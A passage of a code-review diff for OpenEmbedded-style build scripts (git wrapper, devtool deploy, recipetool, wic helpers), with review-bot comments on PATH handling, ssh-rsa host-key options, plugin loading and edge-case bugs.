131REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#git://\4/\5#") 131REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#https://\4/\5#")
132 132
133if [ -z "$BRANCH" ]; then 133if [ -z "$BRANCH" ]; then
134 BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2) 134 BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2)
diff --git a/scripts/git b/scripts/git
new file mode 100755
index 0000000000..644055e540
--- /dev/null
+++ b/scripts/git
@@ -0,0 +1,26 @@
1#!/usr/bin/env python3
2#
3# Wrapper around 'git' that doesn't think we are root
4
5import os
6import shutil
7import sys
8
9os.environ['PSEUDO_UNLOAD'] = '1'
10
11# calculate path to the real 'git'
12path = os.environ['PATH']
13# we need to remove our path but also any other copy of this script which
14# may be present, e.g. eSDK.
15replacements = [os.path.dirname(sys.argv[0])]
16for p in path.split(":"):
17 if p.endswith("/scripts"):
18 replacements.append(p)
19for r in replacements:
20 path = path.replace(r, '/ignoreme')
21real_git = shutil.which('git', path=path)
22
23if len(sys.argv) == 1:
24 os.execl(real_git, 'git')
25
26os.execv(real_git, sys.argv)
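Review bot: The PATH clean-up uses `path.replace(r, '/ignoreme')`, a substring replacement over the whole PATH string, so it also rewrites any entry that merely contains one of the `replacements` values. When the wrapper is started with a relative or bare name, `os.path.dirname(sys.argv[0])` is `.` or empty and the replacement mangles every entry. The lookup can then resolve to a different git than intended, or to none, in which case `real_git` is None and `os.execv` fails with a TypeError instead of a clear message. Filtering PATH entry by entry and checking the result of `shutil.which` avoids both, and reading PATH with `os.environ.get` avoids a KeyError when it is unset.

```python
# calculate path to the real 'git'
our_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
# drop our own directory and any other copy of this script, e.g. eSDK
entries = [p for p in os.environ.get('PATH', '').split(os.pathsep)
           if p and os.path.abspath(p) != our_dir and not p.endswith("/scripts")]
real_git = shutil.which('git', path=os.pathsep.join(entries))
if real_git is None:
    sys.exit("git wrapper: no 'git' found outside the scripts directories")
# … unchanged: execl/execv of real_git …
```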
diff --git a/scripts/lib/buildstats.py b/scripts/lib/buildstats.py
index c69b5bf4d7..3b76286ba5 100644
--- a/scripts/lib/buildstats.py
+++ b/scripts/lib/buildstats.py
@@ -8,7 +8,7 @@ import json
8import logging 8import logging
9import os 9import os
10import re 10import re
11from collections import namedtuple,OrderedDict 11from collections import namedtuple
12from statistics import mean 12from statistics import mean
13 13
14 14
@@ -238,7 +238,7 @@ class BuildStats(dict):
238 subdirs = os.listdir(path) 238 subdirs = os.listdir(path)
239 for dirname in subdirs: 239 for dirname in subdirs:
240 recipe_dir = os.path.join(path, dirname) 240 recipe_dir = os.path.join(path, dirname)
241 if not os.path.isdir(recipe_dir): 241 if dirname == "reduced_proc_pressure" or not os.path.isdir(recipe_dir):
242 continue 242 continue
243 name, epoch, version, revision = cls.split_nevr(dirname) 243 name, epoch, version, revision = cls.split_nevr(dirname)
244 bsrecipe = BSRecipe(name, epoch, version, revision) 244 bsrecipe = BSRecipe(name, epoch, version, revision)
diff --git a/scripts/lib/checklayer/__init__.py b/scripts/lib/checklayer/__init__.py
index fe545607bb..e69a10f452 100644
--- a/scripts/lib/checklayer/__init__.py
+++ b/scripts/lib/checklayer/__init__.py
@@ -146,7 +146,7 @@ def detect_layers(layer_directories, no_auto):
146 146
147 return layers 147 return layers
148 148
149def _find_layer_depends(depend, layers): 149def _find_layer(depend, layers):
150 for layer in layers: 150 for layer in layers:
151 if 'collections' not in layer: 151 if 'collections' not in layer:
152 continue 152 continue
@@ -156,7 +156,7 @@ def _find_layer_depends(depend, layers):
156 return layer 156 return layer
157 return None 157 return None
158 158
159def add_layer_dependencies(bblayersconf, layer, layers, logger): 159def get_layer_dependencies(layer, layers, logger):
160 def recurse_dependencies(depends, layer, layers, logger, ret = []): 160 def recurse_dependencies(depends, layer, layers, logger, ret = []):
161 logger.debug('Processing dependencies %s for layer %s.' % \ 161 logger.debug('Processing dependencies %s for layer %s.' % \
162 (depends, layer['name'])) 162 (depends, layer['name']))
@@ -166,7 +166,7 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
166 if depend == 'core': 166 if depend == 'core':
167 continue 167 continue
168 168
169 layer_depend = _find_layer_depends(depend, layers) 169 layer_depend = _find_layer(depend, layers)
170 if not layer_depend: 170 if not layer_depend:
171 logger.error('Layer %s depends on %s and isn\'t found.' % \ 171 logger.error('Layer %s depends on %s and isn\'t found.' % \
172 (layer['name'], depend)) 172 (layer['name'], depend))
@@ -203,6 +203,11 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
203 layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends) 203 layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends)
204 204
205 # Note: [] (empty) is allowed, None is not! 205 # Note: [] (empty) is allowed, None is not!
206 return layer_depends
207
208def add_layer_dependencies(bblayersconf, layer, layers, logger):
209
210 layer_depends = get_layer_dependencies(layer, layers, logger)
206 if layer_depends is None: 211 if layer_depends is None:
207 return False 212 return False
208 else: 213 else:
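Review bot: The new `get_layer_dependencies(layer, layers, logger)` has no docstring, and its contract is only hinted at by the comment `# Note: [] (empty) is allowed, None is not!` and by the caller's `if layer_depends is None` check. A docstring along the lines of `"""Return the list of layers that layer depends on (possibly empty), or None if a dependency cannot be resolved."""` would make that explicit for other callers. The None case is inferred from the caller, since the part of the body that produces it lies outside the hunks. The nested `recurse_dependencies(..., ret = [])` also keeps a list literal as a default argument, which is unchanged context here.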
diff --git a/scripts/lib/checklayer/cases/common.py b/scripts/lib/checklayer/cases/common.py
index b82304e361..4495f71b24 100644
--- a/scripts/lib/checklayer/cases/common.py
+++ b/scripts/lib/checklayer/cases/common.py
@@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase):
14 # The top-level README file may have a suffix (like README.rst or README.txt). 14 # The top-level README file may have a suffix (like README.rst or README.txt).
15 readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*')) 15 readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*'))
16 self.assertTrue(len(readme_files) > 0, 16 self.assertTrue(len(readme_files) > 0,
17 msg="Layer doesn't contains README file.") 17 msg="Layer doesn't contain a README file.")
18 18
19 # There might be more than one file matching the file pattern above 19 # There might be more than one file matching the file pattern above
20 # (for example, README.rst and README-COPYING.rst). The one with the shortest 20 # (for example, README.rst and README-COPYING.rst). The one with the shortest
diff --git a/scripts/lib/devtool/deploy.py b/scripts/lib/devtool/deploy.py
index aaa25dda08..b4f9fbfe45 100644
--- a/scripts/lib/devtool/deploy.py
+++ b/scripts/lib/devtool/deploy.py
@@ -168,9 +168,9 @@ def deploy(args, config, basepath, workspace):
168 if args.strip and not args.dry_run: 168 if args.strip and not args.dry_run:
169 # Fakeroot copy to new destination 169 # Fakeroot copy to new destination
170 srcdir = recipe_outdir 170 srcdir = recipe_outdir
171 recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'deploy-target-stripped') 171 recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'devtool-deploy-target-stripped')
172 if os.path.isdir(recipe_outdir): 172 if os.path.isdir(recipe_outdir):
173 bb.utils.remove(recipe_outdir, True) 173 exec_fakeroot(rd, "rm -rf %s" % recipe_outdir, shell=True)
174 exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True) 174 exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True)
175 os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or '']) 175 os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or ''])
176 oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'), 176 oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'),
@@ -201,9 +201,9 @@ def deploy(args, config, basepath, workspace):
201 print(' %s' % item) 201 print(' %s' % item)
202 return 0 202 return 0
203 203
204 extraoptions = '' 204 extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
205 if args.no_host_check: 205 if args.no_host_check:
206 extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no' 206 extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
207 if not args.show_status: 207 if not args.show_status:
208 extraoptions += ' -q' 208 extraoptions += ' -q'
209 209
@@ -274,9 +274,9 @@ def undeploy(args, config, basepath, workspace):
274 elif not args.recipename and not args.all: 274 elif not args.recipename and not args.all:
275 raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target') 275 raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target')
276 276
277 extraoptions = '' 277 extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
278 if args.no_host_check: 278 if args.no_host_check:
279 extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no' 279 extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
280 if not args.show_status: 280 if not args.show_status:
281 extraoptions += ' -q' 281 extraoptions += ' -q'
282 282
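Review bot: `-o HostKeyAlgorithms=+ssh-rsa` is now passed on every connection in deploy (new line 204) and undeploy (new line 277), so the client accepts SHA-1 based RSA host key signatures from any target, not only from the older SSH servers that presumably motivated the change. The `+` form only appends to the client's default list, so stronger algorithms are still preferred when the server offers them, but the code does not record why the relaxation is there. I would add a comment such as `# ssh-rsa is off by default in newer OpenSSH clients; re-enabled for targets whose SSH server offers only that host key type`, and consider making the option conditional. Combined with `--no-host-check`, which already disables known-hosts verification, the host is effectively unauthenticated, which is worth stating in the option's help text. Both functions begin and end outside these hunks.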
diff --git a/scripts/lib/devtool/menuconfig.py b/scripts/lib/devtool/menuconfig.py
index 95384c5333..ff9227035d 100644
--- a/scripts/lib/devtool/menuconfig.py
+++ b/scripts/lib/devtool/menuconfig.py
@@ -43,7 +43,7 @@ def menuconfig(args, config, basepath, workspace):
43 return 1 43 return 1
44 44
45 check_workspace_recipe(workspace, args.component) 45 check_workspace_recipe(workspace, args.component)
46 pn = rd.getVar('PN', True) 46 pn = rd.getVar('PN')
47 47
48 if not rd.getVarFlag('do_menuconfig','task'): 48 if not rd.getVarFlag('do_menuconfig','task'):
49 raise DevtoolError("This recipe does not support menuconfig option") 49 raise DevtoolError("This recipe does not support menuconfig option")
diff --git a/scripts/lib/devtool/standard.py b/scripts/lib/devtool/standard.py
index 7b62b7e7b8..cfa88616af 100644
--- a/scripts/lib/devtool/standard.py
+++ b/scripts/lib/devtool/standard.py
@@ -357,7 +357,7 @@ def _move_file(src, dst, dry_run_outdir=None, base_outdir=None):
357 bb.utils.mkdirhier(dst_d) 357 bb.utils.mkdirhier(dst_d)
358 shutil.move(src, dst) 358 shutil.move(src, dst)
359 359
360def _copy_file(src, dst, dry_run_outdir=None): 360def _copy_file(src, dst, dry_run_outdir=None, base_outdir=None):
361 """Copy a file. Creates all the directory components of destination path.""" 361 """Copy a file. Creates all the directory components of destination path."""
362 dry_run_suffix = ' (dry-run)' if dry_run_outdir else '' 362 dry_run_suffix = ' (dry-run)' if dry_run_outdir else ''
363 logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix)) 363 logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix))
@@ -953,12 +953,17 @@ def modify(args, config, basepath, workspace):
953 953
954 if bb.data.inherits_class('kernel', rd): 954 if bb.data.inherits_class('kernel', rd):
955 f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout ' 955 f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout '
956 'do_fetch do_unpack do_kernel_configme do_kernel_configcheck"\n') 956 'do_fetch do_unpack do_kernel_configcheck"\n')
957 f.write('\ndo_patch[noexec] = "1"\n') 957 f.write('\ndo_patch[noexec] = "1"\n')
958 f.write('\ndo_configure_append() {\n' 958 f.write('\ndo_configure_append() {\n'
959 ' cp ${B}/.config ${S}/.config.baseline\n' 959 ' cp ${B}/.config ${S}/.config.baseline\n'
960 ' ln -sfT ${B}/.config ${S}/.config.new\n' 960 ' ln -sfT ${B}/.config ${S}/.config.new\n'
961 '}\n') 961 '}\n')
962 f.write('\ndo_kernel_configme_prepend() {\n'
963 ' if [ -e ${S}/.config ]; then\n'
964 ' mv ${S}/.config ${S}/.config.old\n'
965 ' fi\n'
966 '}\n')
962 if rd.getVarFlag('do_menuconfig','task'): 967 if rd.getVarFlag('do_menuconfig','task'):
963 f.write('\ndo_configure_append() {\n' 968 f.write('\ndo_configure_append() {\n'
964 ' if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n' 969 ' if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n'
diff --git a/scripts/lib/recipetool/create.py b/scripts/lib/recipetool/create.py
index 566c75369a..a2c6d052a6 100644
--- a/scripts/lib/recipetool/create.py
+++ b/scripts/lib/recipetool/create.py
@@ -435,7 +435,7 @@ def create_recipe(args):
435 if args.binary: 435 if args.binary:
436 # Assume the archive contains the directory structure verbatim 436 # Assume the archive contains the directory structure verbatim
437 # so we need to extract to a subdirectory 437 # so we need to extract to a subdirectory
438 fetchuri += ';subdir=${BP}' 438 fetchuri += ';subdir=${BPN}'
439 srcuri = fetchuri 439 srcuri = fetchuri
440 rev_re = re.compile(';rev=([^;]+)') 440 rev_re = re.compile(';rev=([^;]+)')
441 res = rev_re.search(srcuri) 441 res = rev_re.search(srcuri)
@@ -478,6 +478,9 @@ def create_recipe(args):
478 storeTagName = params['tag'] 478 storeTagName = params['tag']
479 params['nobranch'] = '1' 479 params['nobranch'] = '1'
480 del params['tag'] 480 del params['tag']
481 # Assume 'master' branch if not set
482 if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params:
483 params['branch'] = 'master'
481 fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params)) 484 fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params))
482 485
483 tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR') 486 tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR')
@@ -527,10 +530,9 @@ def create_recipe(args):
527 # Remove HEAD reference point and drop remote prefix 530 # Remove HEAD reference point and drop remote prefix
528 get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')] 531 get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')]
529 if 'master' in get_branch: 532 if 'master' in get_branch:
530 # If it is master, we do not need to append 'branch=master' as this is default.
531 # Even with the case where get_branch has multiple objects, if 'master' is one 533 # Even with the case where get_branch has multiple objects, if 'master' is one
532 # of them, we should default take from 'master' 534 # of them, we should default take from 'master'
533 srcbranch = '' 535 srcbranch = 'master'
534 elif len(get_branch) == 1: 536 elif len(get_branch) == 1:
535 # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch' 537 # If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch'
536 srcbranch = get_branch[0] 538 srcbranch = get_branch[0]
@@ -543,8 +545,8 @@ def create_recipe(args):
543 # Since we might have a value in srcbranch, we need to 545 # Since we might have a value in srcbranch, we need to
544 # recontruct the srcuri to include 'branch' in params. 546 # recontruct the srcuri to include 'branch' in params.
545 scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri) 547 scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri)
546 if srcbranch: 548 if scheme in ['git', 'gitsm']:
547 params['branch'] = srcbranch 549 params['branch'] = srcbranch or 'master'
548 550
549 if storeTagName and scheme in ['git', 'gitsm']: 551 if storeTagName and scheme in ['git', 'gitsm']:
550 # Check srcrev using tag and check validity of the tag 552 # Check srcrev using tag and check validity of the tag
@@ -603,7 +605,7 @@ def create_recipe(args):
603 splitline = line.split() 605 splitline = line.split()
604 if len(splitline) > 1: 606 if len(splitline) > 1:
605 if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]): 607 if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]):
606 srcuri = reformat_git_uri(splitline[1]) 608 srcuri = reformat_git_uri(splitline[1]) + ';branch=master'
607 srcsubdir = 'git' 609 srcsubdir = 'git'
608 break 610 break
609 611
@@ -743,6 +745,10 @@ def create_recipe(args):
743 for handler in handlers: 745 for handler in handlers:
744 handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues) 746 handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues)
745 747
748 # native and nativesdk classes are special and must be inherited last
749 # If present, put them at the end of the classes list
750 classes.sort(key=lambda c: c in ("native", "nativesdk"))
751
746 extrafiles = extravalues.pop('extrafiles', {}) 752 extrafiles = extravalues.pop('extrafiles', {})
747 extra_pn = extravalues.pop('PN', None) 753 extra_pn = extravalues.pop('PN', None)
748 extra_pv = extravalues.pop('PV', None) 754 extra_pv = extravalues.pop('PV', None)
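Review bot: At new line 608 `;branch=master` is appended to the origin URL of an existing checkout without looking at which branch that checkout is on, so a source tree tracking another branch may get a SRC_URI naming a branch that does not contain the revision in use. The hunks at new lines 481-483 and 548-549 at least take `params` or `srcbranch` into account, while this one hard-codes the value. If deriving the branch from the local tree is out of scope here, a comment such as `# assumes origin's branch is master; SRC_URI needs editing if the tree tracks another branch` would make the assumption visible. create_recipe extends well beyond these hunks, so how `srcuri` is used afterwards is not visible.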
diff --git a/scripts/lib/resulttool/report.py b/scripts/lib/resulttool/report.py
index f0ca50ebe2..a349510ab8 100644
--- a/scripts/lib/resulttool/report.py
+++ b/scripts/lib/resulttool/report.py
@@ -176,7 +176,10 @@ class ResultsTextReport(object):
176 vals['sort'] = line['testseries'] + "_" + line['result_id'] 176 vals['sort'] = line['testseries'] + "_" + line['result_id']
177 vals['failed_testcases'] = line['failed_testcases'] 177 vals['failed_testcases'] = line['failed_testcases']
178 for k in cols: 178 for k in cols:
179 vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f')) 179 if total_tested:
180 vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
181 else:
182 vals[k] = "0 (0%)"
180 for k in maxlen: 183 for k in maxlen:
181 if k in vals and len(vals[k]) > maxlen[k]: 184 if k in vals and len(vals[k]) > maxlen[k]:
182 maxlen[k] = len(vals[k]) 185 maxlen[k] = len(vals[k])
diff --git a/scripts/lib/resulttool/resultutils.py b/scripts/lib/resulttool/resultutils.py
index 8917022d36..c5521d81bd 100644
--- a/scripts/lib/resulttool/resultutils.py
+++ b/scripts/lib/resulttool/resultutils.py
@@ -58,7 +58,11 @@ def append_resultsdata(results, f, configmap=store_map, configvars=extra_configv
58 testseries = posixpath.basename(posixpath.dirname(url.path)) 58 testseries = posixpath.basename(posixpath.dirname(url.path))
59 else: 59 else:
60 with open(f, "r") as filedata: 60 with open(f, "r") as filedata:
61 data = json.load(filedata) 61 try:
62 data = json.load(filedata)
63 except json.decoder.JSONDecodeError:
64 print("Cannot decode {}. Possible corruption. Skipping.".format(f))
65 data = ""
62 testseries = os.path.basename(os.path.dirname(f)) 66 testseries = os.path.basename(os.path.dirname(f))
63 else: 67 else:
64 data = f 68 data = f
@@ -142,7 +146,7 @@ def generic_get_log(sectionname, results, section):
142 return decode_log(ptest['log']) 146 return decode_log(ptest['log'])
143 147
144def ptestresult_get_log(results, section): 148def ptestresult_get_log(results, section):
145 return generic_get_log('ptestresuls.sections', results, section) 149 return generic_get_log('ptestresult.sections', results, section)
146 150
147def generic_get_rawlogs(sectname, results): 151def generic_get_rawlogs(sectname, results):
148 if sectname not in results: 152 if sectname not in results:
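Review bot: On the `JSONDecodeError` path (new line 65) `data` is set to an empty string, while the other branches leave it holding parsed JSON or the object passed in as `f`. The code that consumes `data` is outside this hunk, so whether a `str` is handled there cannot be checked from here; `data = {}` would keep the type consistent with a decoded results file. The skip message is also written with `print()`, so it bypasses whatever logging level the caller has configured.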
diff --git a/scripts/lib/scriptutils.py b/scripts/lib/scriptutils.py
index f92255d8dc..47a08194d0 100644
--- a/scripts/lib/scriptutils.py
+++ b/scripts/lib/scriptutils.py
@@ -18,7 +18,8 @@ import sys
18import tempfile 18import tempfile
19import threading 19import threading
20import importlib 20import importlib
21from importlib import machinery 21import importlib.machinery
22import importlib.util
22 23
23class KeepAliveStreamHandler(logging.StreamHandler): 24class KeepAliveStreamHandler(logging.StreamHandler):
24 def __init__(self, keepalive=True, **kwargs): 25 def __init__(self, keepalive=True, **kwargs):
@@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath):
82 logger.debug('Loading plugin %s' % name) 83 logger.debug('Loading plugin %s' % name)
83 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) 84 spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
84 if spec: 85 if spec:
85 return spec.loader.load_module() 86 mod = importlib.util.module_from_spec(spec)
87 spec.loader.exec_module(mod)
88 return mod
86 89
87 def plugin_name(filename): 90 def plugin_name(filename):
88 return os.path.splitext(os.path.basename(filename))[0] 91 return os.path.splitext(os.path.basename(filename))[0]
@@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr
215 pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE'] 218 pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE']
216 for pathvar in pathvars: 219 for pathvar in pathvars:
217 path = rd.getVar(pathvar) 220 path = rd.getVar(pathvar)
218 shutil.rmtree(path) 221 if os.path.exists(path):
222 shutil.rmtree(path)
219 finally: 223 finally:
220 if fetchrecipe: 224 if fetchrecipe:
221 try: 225 try:
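Review bot: Unlike the `load_module()` call it replaces, `importlib.util.module_from_spec()` followed by `exec_module()` at new lines 86-87 does not add the module to `sys.modules`, so a plugin loaded this way is not visible to a later `import` of the same name and is executed again on each load. If that is intended, a comment such as `# deliberately not registered in sys.modules` would record it; otherwise add `sys.modules[name] = mod` before `exec_module`. The same pattern appears in scripts/lib/wic/pluginbase.py (new lines 59-61). Both loaders execute whatever Python files are found in the plugin directory, so that directory should be writable only by the build user. load_plugins extends beyond this hunk.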
diff --git a/scripts/lib/wic/engine.py b/scripts/lib/wic/engine.py
index 9ff4394757..7dbde85696 100644
--- a/scripts/lib/wic/engine.py
+++ b/scripts/lib/wic/engine.py
@@ -19,10 +19,10 @@ import os
19import tempfile 19import tempfile
20import json 20import json
21import subprocess 21import subprocess
22import shutil
22import re 23import re
23 24
24from collections import namedtuple, OrderedDict 25from collections import namedtuple, OrderedDict
25from distutils.spawn import find_executable
26 26
27from wic import WicError 27from wic import WicError
28from wic.filemap import sparse_copy 28from wic.filemap import sparse_copy
@@ -245,7 +245,7 @@ class Disk:
245 for path in pathlist.split(':'): 245 for path in pathlist.split(':'):
246 self.paths = "%s%s:%s" % (native_sysroot, path, self.paths) 246 self.paths = "%s%s:%s" % (native_sysroot, path, self.paths)
247 247
248 self.parted = find_executable("parted", self.paths) 248 self.parted = shutil.which("parted", path=self.paths)
249 if not self.parted: 249 if not self.parted:
250 raise WicError("Can't find executable parted") 250 raise WicError("Can't find executable parted")
251 251
@@ -283,7 +283,7 @@ class Disk:
283 "resize2fs", "mkswap", "mkdosfs", "debugfs"): 283 "resize2fs", "mkswap", "mkdosfs", "debugfs"):
284 aname = "_%s" % name 284 aname = "_%s" % name
285 if aname not in self.__dict__: 285 if aname not in self.__dict__:
286 setattr(self, aname, find_executable(name, self.paths)) 286 setattr(self, aname, shutil.which(name, path=self.paths))
287 if aname not in self.__dict__ or self.__dict__[aname] is None: 287 if aname not in self.__dict__ or self.__dict__[aname] is None:
288 raise WicError("Can't find executable '{}'".format(name)) 288 raise WicError("Can't find executable '{}'".format(name))
289 return self.__dict__[aname] 289 return self.__dict__[aname]
diff --git a/scripts/lib/wic/help.py b/scripts/lib/wic/help.py
index 62a2a90e79..fcace95ff4 100644
--- a/scripts/lib/wic/help.py
+++ b/scripts/lib/wic/help.py
@@ -840,8 +840,8 @@ DESCRIPTION
840 meanings. The commands are based on the Fedora kickstart 840 meanings. The commands are based on the Fedora kickstart
841 documentation but with modifications to reflect wic capabilities. 841 documentation but with modifications to reflect wic capabilities.
842 842
843 http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition 843 https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition
844 http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader 844 https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader
845 845
846 Commands 846 Commands
847 847
diff --git a/scripts/lib/wic/misc.py b/scripts/lib/wic/misc.py
index e4b5a0d519..3e11822996 100644
--- a/scripts/lib/wic/misc.py
+++ b/scripts/lib/wic/misc.py
@@ -16,9 +16,9 @@ import logging
16import os 16import os
17import re 17import re
18import subprocess 18import subprocess
19import shutil
19 20
20from collections import defaultdict 21from collections import defaultdict
21from distutils import spawn
22 22
23from wic import WicError 23from wic import WicError
24 24
@@ -26,6 +26,7 @@ logger = logging.getLogger('wic')
26 26
27# executable -> recipe pairs for exec_native_cmd 27# executable -> recipe pairs for exec_native_cmd
28NATIVE_RECIPES = {"bmaptool": "bmap-tools", 28NATIVE_RECIPES = {"bmaptool": "bmap-tools",
29 "dumpe2fs": "e2fsprogs",
29 "grub-mkimage": "grub-efi", 30 "grub-mkimage": "grub-efi",
30 "isohybrid": "syslinux", 31 "isohybrid": "syslinux",
31 "mcopy": "mtools", 32 "mcopy": "mtools",
@@ -45,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools",
45 "parted": "parted", 46 "parted": "parted",
46 "sfdisk": "util-linux", 47 "sfdisk": "util-linux",
47 "sgdisk": "gptfdisk", 48 "sgdisk": "gptfdisk",
48 "syslinux": "syslinux" 49 "syslinux": "syslinux",
50 "tar": "tar"
49 } 51 }
50 52
51def runtool(cmdln_or_args): 53def runtool(cmdln_or_args):
@@ -112,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False):
112 """ 114 """
113 return _exec_cmd(cmd_and_args, as_shell)[1] 115 return _exec_cmd(cmd_and_args, as_shell)[1]
114 116
117def find_executable(cmd, paths):
118 recipe = cmd
119 if recipe in NATIVE_RECIPES:
120 recipe = NATIVE_RECIPES[recipe]
121 provided = get_bitbake_var("ASSUME_PROVIDED")
122 if provided and "%s-native" % recipe in provided:
123 return True
124
125 return shutil.which(cmd, path=paths)
115 126
116def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""): 127def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
117 """ 128 """
@@ -140,7 +151,7 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
140 logger.debug("exec_native_cmd: %s", native_cmd_and_args) 151 logger.debug("exec_native_cmd: %s", native_cmd_and_args)
141 152
142 # If the command isn't in the native sysroot say we failed. 153 # If the command isn't in the native sysroot say we failed.
143 if spawn.find_executable(args[0], native_paths): 154 if find_executable(args[0], native_paths):
144 ret, out = _exec_cmd(native_cmd_and_args, True) 155 ret, out = _exec_cmd(native_cmd_and_args, True)
145 else: 156 else:
146 ret = 127 157 ret = 127
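Review bot: The `ASSUME_PROVIDED` test in the new `find_executable` (new line 122) is a substring match on the raw variable value, so `tar-native` also matches an entry such as `bsdtar-native` (constructed example), and the function then reports a tool as available that was never located. Splitting first avoids that: `if provided and "%s-native" % recipe in provided.split():`. The function also returns `True` in that case and a path string or `None` otherwise. A one-line docstring saying that the result is only meant to be tested for truth would keep later callers from using it as a path.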
diff --git a/scripts/lib/wic/partition.py b/scripts/lib/wic/partition.py
index e574f40c47..792bb3dcd3 100644
--- a/scripts/lib/wic/partition.py
+++ b/scripts/lib/wic/partition.py
@@ -104,7 +104,7 @@ class Partition():
104 extra_blocks = self.extra_space 104 extra_blocks = self.extra_space
105 105
106 rootfs_size = actual_rootfs_size + extra_blocks 106 rootfs_size = actual_rootfs_size + extra_blocks
107 rootfs_size *= self.overhead_factor 107 rootfs_size = int(rootfs_size * self.overhead_factor)
108 108
109 logger.debug("Added %d extra blocks to %s to get to %d total blocks", 109 logger.debug("Added %d extra blocks to %s to get to %d total blocks",
110 extra_blocks, self.mountpoint, rootfs_size) 110 extra_blocks, self.mountpoint, rootfs_size)
@@ -298,6 +298,8 @@ class Partition():
298 mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs) 298 mkfs_cmd = "fsck.%s -pvfD %s" % (self.fstype, rootfs)
299 exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo) 299 exec_native_cmd(mkfs_cmd, native_sysroot, pseudo=pseudo)
300 300
301 self.check_for_Y2038_problem(rootfs, native_sysroot)
302
301 def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir, 303 def prepare_rootfs_btrfs(self, rootfs, cr_workdir, oe_builddir, rootfs_dir,
302 native_sysroot, pseudo): 304 native_sysroot, pseudo):
303 """ 305 """
@@ -388,6 +390,8 @@ class Partition():
388 (self.fstype, extraopts, label_str, self.fsuuid, rootfs) 390 (self.fstype, extraopts, label_str, self.fsuuid, rootfs)
389 exec_native_cmd(mkfs_cmd, native_sysroot) 391 exec_native_cmd(mkfs_cmd, native_sysroot)
390 392
393 self.check_for_Y2038_problem(rootfs, native_sysroot)
394
391 def prepare_empty_partition_btrfs(self, rootfs, oe_builddir, 395 def prepare_empty_partition_btrfs(self, rootfs, oe_builddir,
392 native_sysroot): 396 native_sysroot):
393 """ 397 """
